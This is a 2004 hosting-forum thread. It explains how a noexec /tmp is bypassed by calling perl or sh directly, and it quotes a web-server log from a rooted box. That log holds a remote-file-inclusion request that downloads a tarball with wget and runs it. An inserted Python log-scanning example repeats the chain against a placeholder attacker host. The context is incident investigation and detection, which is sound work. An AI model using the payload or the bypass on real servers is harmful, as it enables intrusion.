
How to execute a file in a noexec tmp/?

Discussion in 'General Discussion' started by mikehvvc, Sep 12, 2004.

  1. mikehvvc

    Hello,

    I recently read a post saying it was possible for someone to execute a file in a noexec /tmp. Is this possible, and if so, how? Thanks.



    -Mike
     
  2. chirpy

    Yes, it's simple.

    For example, if you copy a perl script to /tmp with noexec enabled, then this won't work:

    /tmp/script.pl

    but, this will:

    perl /tmp/script.pl

    The same goes for shell scripts, for example this won't work:

    /tmp/script.sh

    but this will:

    sh /tmp/script.sh

    It becomes only slightly more difficult with binaries in /tmp, but all you have to do is write a shell wrapper and you can then use the above.

    So, it's not much of a protection, but it is one layer in your server security structure.
     
  3. mikehvvc

    Chirpy,

    Thank you for your reply. The reason I asked about this is that I had a box get rooted for the second time, even when I had locked down tmp/. Not that locking tmp/ will solve all security issues with a box, but they seem to have run the same type of exploit as before. They installed an IRC app (psybnc) and other misc binaries in tmp/. I am new to investigating such matters, so if anyone has any pointers on how to track down how they got it, please let me know. I looked in various log files and saw that they did a portscan of some type. It ain't no nmap, I will tell you, lol. Here is what I found when I did a "grep wget /usr/local/apache/domlogs/*":

    /usr/local/apache/domlogs/domain.com:ip address- - [09/Sep/2004:07:21:42 -0400] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.somedomain.biz/b?&cmd=cd%20/dev/shm;wget%20www.somedomain.or/alexander/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.1" 200 558 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iOpus-I-M)"

    Anyways, if anyone has more tips on how to investigate a hack, let me know. Thanks.



    -Mike
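The grep over the domlogs in the post above is the right instinct. The following is an added example (my own code, not from this thread or from cPanel) that takes lines in that same grep-prefixed combined-log form, URL-decodes each query parameter and flags only values carrying a remote URL or a chained shell command, so a search term that merely contains "wget" is not reported. The log lines, client IPs and the attacker.example host are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in the "grep pattern /usr/local/apache/domlogs/*" output
# form (file name prefix, then an Apache combined-log line). Client IPs are
# from the documentation ranges and hosts are attacker.example: placeholders,
# not real indicators.
SAMPLE_LOG = """\
/usr/local/apache/domlogs/example.com:203.0.113.5 - - [09/Sep/2004:07:21:42 -0400] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/b?&cmd=cd%20/dev/shm;wget%20attacker.example/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.1" 200 558 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
/usr/local/apache/domlogs/example.com:198.51.100.7 - - [09/Sep/2004:07:22:01 -0400] "GET /search.php?q=wget+manual HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
/usr/local/apache/domlogs/example.com:198.51.100.9 - - [09/Sep/2004:07:25:13 -0400] "GET /index.php?page=about HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Optional "file:" prefix from grep, then the start of a combined-log line.
LOG_RE = re.compile(
    r'^(?:/\S*?:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3})')
# A shell separator AND a fetch/unpack/run verb in one decoded value: a bare
# "wget" in a search term is not enough, "cd /dev/shm;wget ...;./start" is.
SEPARATOR_RE = re.compile(r'[;|`]|&&|\$\(')
VERB_RE = re.compile(r'\b(?:wget|curl|fetch|tar|chmod|perl|sh)\b|\./\w', re.I)
RFI_RE = re.compile(r'^(?:https?|ftp)://', re.I)

def query_params(path):
    """Decode the query string into (name, value) pairs. Split on '&' only:
    ';' stays inside the value because here it is a shell separator."""
    _, _, query = path.partition("?")
    if not query:
        return []
    return [tuple(unquote_plus(part) for part in item.partition("=")[::2])
            for item in query.split("&")]

def find_injection_attempts(log_text):
    """Return one finding per log line whose query carries a remote URL
    (remote file inclusion) or a chained shell command (injection)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons, decoded = [], []
        for name, value in query_params(m.group("path")):
            if RFI_RE.match(value):
                reasons.append("remote URL in " + name)
            if SEPARATOR_RE.search(value) and VERB_RE.search(value):
                reasons.append("shell chain in " + name)
                decoded.append(value)  # the decoded command, as the server saw it
        if reasons:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "status": m.group("status"), "reasons": reasons,
                             "commands": decoded})
    return findings

if __name__ == "__main__":
    for f in find_injection_attempts(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], "; ".join(f["reasons"]))
        for cmd in f["commands"]:
            print("   ", cmd)
```

A 200 status on a flagged request means the script ran, so the decoded command is the list of paths (here /dev/shm) and files to check next.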
     
  4. sawbuck

  5. kris1351

    mod_security helps with the perl scripts running like that I believe.
     